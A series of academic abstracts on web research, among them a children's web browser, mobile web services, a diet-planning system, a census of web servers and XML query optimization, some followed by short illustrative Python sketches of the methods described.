It has become common for children to browse web pages. However, no web browser takes into account children's characteristics in information acquisition. As a result, even though general pages contain varied and detailed information, children cannot use the internet effectively with current web browsers; for example, they have difficulty understanding the contents and easily get bored when browsing general pages. The purpose of this paper is to propose a children-oriented web browser that aims to keep children interested in pages and help them understand the contents of those pages.
Design/methodology/approach
The paper designed and implemented a web browser for children using a bubble metaphor, which converts general pages into a children‐friendly presentation. The browser is displayed in an undersea scene and presents contents of a web page in bubbles of different sizes, speeds, and colors. Furthermore, it presents the details of the content in a picture book style in a way that children can easily understand.
Findings
The paper reports a user experiment with 13 children between four and ten years of age. The experimental results show that the browser changes general pages into a children-friendly presentation and makes web browsing fun for children.
Originality/value
To the best of the authors' knowledge, this is the first investigation into the web browsing characteristics of children. The findings may be useful to researchers who are interested in the relationships between children and the web, as well as in children's information acquisition.
A method for improving the retrieval effectiveness of a search engine by employing a website directory, e.g. the Yahoo! Japan directory or the Google directory, as a concept dictionary is proposed. A user can examine the results of a search engine from the top rank as usual, except that he/she is assisted by a suggestion about which webpages are worthy of examination. To make a suggestion, the conceptual closeness of an unexamined webpage to the query, or to each of the webpages the user has shown interest in, is calculated via a website directory. The proposed method was evaluated on the search results of Japanese Excite.
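One simple way to operationalize such a closeness measure, assuming each page is mapped to its directory category path, is to score how deep two category paths share a common prefix. The sketch below uses this assumption and invented categories; it is not necessarily the exact measure used in the paper.

```python
# Conceptual closeness via directory categories: deeper shared prefixes score higher.
def closeness(cat_a: list[str], cat_b: list[str]) -> float:
    shared = 0
    for a, b in zip(cat_a, cat_b):
        if a != b:
            break
        shared += 1
    # Normalise by the longer path so deeper, more specific matches score higher.
    return shared / max(len(cat_a), len(cat_b))

page_of_interest = ["Computers", "Internet", "Searching", "Search_Engines"]
candidate_page   = ["Computers", "Internet", "Searching", "Directories"]
unrelated_page   = ["Recreation", "Travel"]

print(closeness(page_of_interest, candidate_page))   # 0.75 -> suggest examining
print(closeness(page_of_interest, unrelated_page))   # 0.0  -> deprioritise
```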
Web services refer to a specific set of technologies used to implement a Service Oriented Architecture. Thanks to maturing web services standards and to new mobile devices and application solutions, progress is being made in presenting similar web services offerings in both mobile and fixed networks. Bringing that architecture and the solutions it will support to the world of mobility is a significant issue in m-business applications, because mobile web services offer various advantages: reduction of the overall cost of development (by reusing existing system components), faster time to market for products (through rapid application development and deployment), and remarkable possibilities for new applications with increased functionality to emerge. In addition, the new and forthcoming mobile networks, with native IP connectivity and high-speed transmission capability, allow the development of a variety of modern multimedia services. Multimedia Messaging Services (capable of mixing media types to enable more intuitive messaging) and Instant Messaging and Presence Services (dedicated to presence, instant messaging, and the distribution and sharing of multimedia content in groups of users) provide suitable underlying capabilities to support location-based and context-sensitive multimedia services. In this paper we present the current approaches regarding the architectural, functional, and security features that allow enterprises to enjoy the benefits of traditional web services in the mobile multimedia domain.
Encouraging socio-economic development in developing countries has resulted in many changes in the lifestyle of communities. Changes in dietary patterns are one of the main outcomes of this rapid socio-economic advancement, for example excessive intake of fat, high-protein (animal protein) diets, salt, and preservatives. Chronic diseases such as diabetes, coronary artery disease, hypertension, and cancer are mostly related to diet. With the community becoming more nutrition and health conscious, one of the challenges faced is to make sure that information and knowledge on diet and healthy lifestyles get across to the community. This paper presents a model of a web-based diet system (WebDIET) that attempts to make diet information and menu plans customised to local preferences more accessible via the internet. The system is to be used by dieticians, who serve as administrators, and by the public, who are the end users. The dietary standard adopted in developing the system is the Recommended Dietary Allowances (RDA) for Malaysia. The Malaysian Dietary Guidelines were also consulted, as they emphasise the Malaysian diet. The system consists of six modules, namely the Authentication Module, Menu Plan Module, Diabetic Menu Plan Module, Food Selection Module, Disease Info Module, and Feedback Module. The Diabetic Menu Plan Module models the reasoning process employed by dieticians in suggesting menu plans. The planning task is solved using an artificial intelligence technique, the case-based reasoning (CBR) approach. CBR generally describes the process of solving a current problem based on the solutions of similar problems in the past. The Nearest Neighbour algorithm was used to compute similarities as a weighted average. The tools used to develop the system are Microsoft Visual Interdev and Microsoft FrontPage 2000, while HTML, VBScript, and JavaScript are the scripting languages used.
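The weighted nearest-neighbour retrieval at the heart of such a CBR module can be sketched as follows. The attributes, weights, normalisation ranges, and case base are invented for illustration, since the abstract does not specify WebDIET's actual case representation.

```python
# Weighted nearest-neighbour case retrieval for a toy menu-planning case base.
CASE_BASE = [
    {"age": 55, "weight_kg": 82, "calorie_target": 1800, "menu": "plan_A"},
    {"age": 40, "weight_kg": 65, "calorie_target": 2000, "menu": "plan_B"},
    {"age": 62, "weight_kg": 90, "calorie_target": 1600, "menu": "plan_C"},
]
WEIGHTS = {"age": 0.3, "weight_kg": 0.3, "calorie_target": 0.4}
RANGES  = {"age": 60.0, "weight_kg": 80.0, "calorie_target": 1200.0}  # for normalisation

def similarity(new_case: dict, stored: dict) -> float:
    # Weighted average of per-attribute similarities (1 - normalised distance).
    total = 0.0
    for attr, w in WEIGHTS.items():
        dist = abs(new_case[attr] - stored[attr]) / RANGES[attr]
        total += w * (1.0 - min(dist, 1.0))
    return total

def retrieve(new_case: dict) -> dict:
    # Nearest neighbour: the stored case with the highest weighted similarity.
    return max(CASE_BASE, key=lambda c: similarity(new_case, c))

patient = {"age": 58, "weight_kg": 85, "calorie_target": 1700}
print(retrieve(patient)["menu"])   # -> 'plan_C' for this toy case base
```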
With the rise of mobile devices such as cellphones and Personal Digital Assistants (PDAs) in recent years, the demand for specialized mobile solutions has grown. Newly defined protocols such as WAP or i-Mode can be used to adapt internet presences to mobile devices. However, achieving these adaptations is often laborious, as almost all pages have to be rewritten. This paper shows an approach for semi-automatic page generation for mobile devices. It is assumed that a general HTML page already exists; based on this page, an approach for generating personalized, mobile-device-compatible pages is shown. The approach is illustrated using the software eSarine, an e-shop software that can be used to set up an electronic shop.
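A generic illustration of the kind of page simplification such an approach relies on is sketched below: starting from an existing HTML page, only lightweight content (headings, paragraphs, links) is kept, while images and scripts are dropped. This is a sketch under our own assumptions, not the eSarine implementation.

```python
from html.parser import HTMLParser

class MobileSimplifier(HTMLParser):
    KEEP = {"h1", "h2", "h3", "p", "a", "br"}   # lightweight tags retained for small screens
    DROP = {"script", "style"}                   # heavy or irrelevant content removed entirely

    def __init__(self):
        super().__init__()
        self.out = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in self.DROP:
            self._skip += 1
        elif tag in self.KEEP:
            self.out.append(f"<{tag}>")

    def handle_endtag(self, tag):
        if tag in self.DROP and self._skip:
            self._skip -= 1
        elif tag in self.KEEP and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip and data.strip():
            self.out.append(data.strip())

page = "<html><body><h1>Shop</h1><script>track()</script><p>Welcome <img src='x.png'> to the store.</p></body></html>"
s = MobileSimplifier()
s.feed(page)
print(" ".join(s.out))   # <h1> Shop </h1> <p> Welcome to the store. </p>
```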
Purpose
– To measure the exact size of the world wide web (i.e. a census). The measure used is the number of publicly accessible web servers on port 80.
Design/methodology/approach
– Every IP address on the internet is queried for the presence of a web server.
Findings
– The census found 18,560,257 web servers.
Research limitations/implications
– Any web servers hidden behind a firewall, or that did not respond within a reasonable amount of time (20 seconds), were not counted by the census.
Practical implications
– Whenever a server is found, a copy of its homepage is downloaded and stored. The resulting database of homepages is a historical snapshot of the web, which will be mined for information in the future.
Originality/value
– Past web surveys performed by various research groups only estimated the size of the web. This is the first time its size has been exactly measured.
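The basic probe behind such a census can be sketched as follows: attempt a TCP connection to port 80 within the 20-second limit and, if a server answers, fetch its homepage. The address shown is a documentation-range placeholder; a real census would iterate over the entire routable IPv4 space with heavy parallelism.

```python
import socket

def probe(ip: str, timeout: float = 20.0):
    """Return the raw HTTP response from port 80 of `ip`, or None if no server answers."""
    try:
        with socket.create_connection((ip, 80), timeout=timeout) as sock:
            sock.settimeout(timeout)
            # Minimal HTTP/1.0 request for the homepage.
            sock.sendall(b"GET / HTTP/1.0\r\nHost: " + ip.encode() + b"\r\n\r\n")
            chunks = []
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
            return b"".join(chunks)          # raw response, to be stored in the snapshot database
    except OSError:
        return None                          # timeout, refusal, or filtering: not counted

print(probe("192.0.2.1") is not None)
```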
Purpose
Engines have been built that execute queries against XML data. The aim of this paper is to describe a novel technique that can be used to improve the speed of query execution based on the semantics of the data in the XML document.
Design/methodology/approach
The paper formally introduces algorithms for optimizing XML queries, implements the algorithms, and demonstrates the improvement in speed through experimentation.
Findings
Three possible semantic query optimizations based on the values of elements were introduced; the experiments demonstrate that two of the three improve query performance while the third does not. A hypothesis is offered as to why this is the case.
Research limitations/implications
A limitation is obviously the query engine itself and how it works. Future work includes executing the experiments on a different engine and comparing results; building a system to automatically generate the characteristics needed for the optimization; describing the best way to represent and maintain the characteristics once they are found; and comparing the results of content-based optimizations with structure-based ones.
Practical implications
The optimizations could be incorporated into new query engines.
Originality/value
Novel algorithms for query optimization have been developed and proven to work. They are of value to people who are building database systems for XML data.
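One flavour of the value-based semantic optimization the abstract alludes to can be sketched as follows: if a known constraint on element values contradicts a query predicate, the query can be answered as empty without scanning the document. The constraint table, element names, and query form are invented for illustration and are not the paper's actual algorithms.

```python
from xml.etree import ElementTree as ET

# Semantic knowledge gathered ahead of time (e.g. from the data or a schema):
# every <price> value in the collection lies within the stated range.
VALUE_RANGES = {"price": (0.0, 100.0)}

def query_prices_greater_than(doc: ET.Element, threshold: float):
    lo, hi = VALUE_RANGES["price"]
    if threshold >= hi:
        return []                      # predicate contradicts the constraint: skip the scan
    # Otherwise fall back to ordinary evaluation.
    return [e for e in doc.iter("price") if float(e.text) > threshold]

doc = ET.fromstring("<items><price>10</price><price>95</price></items>")
print(query_prices_greater_than(doc, 200.0))   # [] without touching the document
print(query_prices_greater_than(doc, 50.0))    # one matching element
```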